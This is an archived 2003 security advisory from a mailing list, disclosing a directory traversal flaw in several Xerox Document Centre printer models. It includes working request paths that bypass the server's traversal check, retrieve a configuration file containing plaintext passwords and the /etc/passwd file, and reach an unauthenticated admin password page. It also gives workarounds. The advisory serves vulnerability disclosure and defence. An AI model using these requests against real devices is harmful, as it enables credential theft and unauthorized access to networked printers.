[NEWS] Security Vulnerability in Xerox Document Centre (Directory Traversal)
From: SecuriTeam (support_at_securiteam.com)
Date: 12/22/03
- Previous message: SecuriTeam: "[NT] Multiple Vulnerabilities in ASPapp Products"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 22 Dec 2003 12:28:29 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Security Vulnerability in Xerox Document Centre (Directory Traversal)
------------------------------------------------------------------------
SUMMARY
A security vulnerability has been found in the Xerox Document Centre, this
vulnerability allows remote access to files, access to plaintext passwords
for the HTTP administration interface, access to DES passwords for the
operating system, and read-write access to HTTP users and passwords.
DETAILS
Vulnerable systems:
* Xerox Document Centre 440DC
* Xerox Document Centre 480DC
* Xerox Document Centre 425ST
* Xerox Document Centre 470
* Xerox Document Centre 255ST
Xerox's web server software (reports itself as
"Xerox_MicroServer/Xerox11") for Xerox hardware will return a binary dump
of directories when the requested URL ends with "/.." or with "/.".
Therefore, you can easily build a directory/file tree from the document
root with which you can get any file you desire.
The server has some directory traversal blocking mechanism set in place,
therefore you can't get back past the document root, since the web server
seems to reject "../" if it tries to climb back too much.
A request like:
GET /../..
Will return, "The request had invalid syntax".
However, requesting "../" will not.
Therefore a request like:
GET /assist/.
Will return an "OK" response.
What appears to be happening is the fact that the server counts the "../"
groups and compares the count to the total number of "/".
A request like:
GET /assist/////.././../../.
Will in fact return an "OK" response.
Examples:
Requesting: http://xerox_dc_470.example.com/..
Will return:
00 00 00 00 45 00 0c 00 01 2e 00 00 00 00 00 00 43 ...E...........C
10 00 0c 00 02 2e 2e 00 00 00 00 00 46 00 10 00 06 ...........F....
20 63 6f 6e 66 69 67 00 00 00 00 00 48 00 10 00 06 config.....H....
30 68 74 64 6f 63 73 00 00 00 00 02 26 00 10 00 04 htdocs.....&....
40 6a 6f 62 73 00 00 00 00 00 00 02 29 01 b8 00 04 jobs.......)....
50 6c 61 6e 67 00 00 00 00 00 00 00 00 00 00 00 00 lang............
60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
Requesting:
http://xerox_dc_470.example.com////../../data/config/microsrv.cfg
Will return the configuration file, including plain text passwords.
Requesting:
http://xerox_dc_470.example.com////////../../../../../../etc/passwd
Will return you the passwd file (which you can then run crack on).
Even without using ".." you can get the plain text passwords for the HTTP
interface, this is done by requesting:
http://xerox_dc_470.example.com/srvadmin/usersecure.dhtml.
From that page, you can even create new users; when you press "Apply new
settings" button prompts for admin password, the same you just have read
in that same page.
Workaround:
* Disable the HTTP interface
* Restrict access permissions to trusted hosts
ADDITIONAL INFORMATION
The information has been provided by <mailto:spd@shiva.cps.unizar.es>
J.A. Gutierrez and <mailto:brandonp@insynclh.com> brandon pierce.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] Multiple Vulnerabilities in ASPapp Products"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
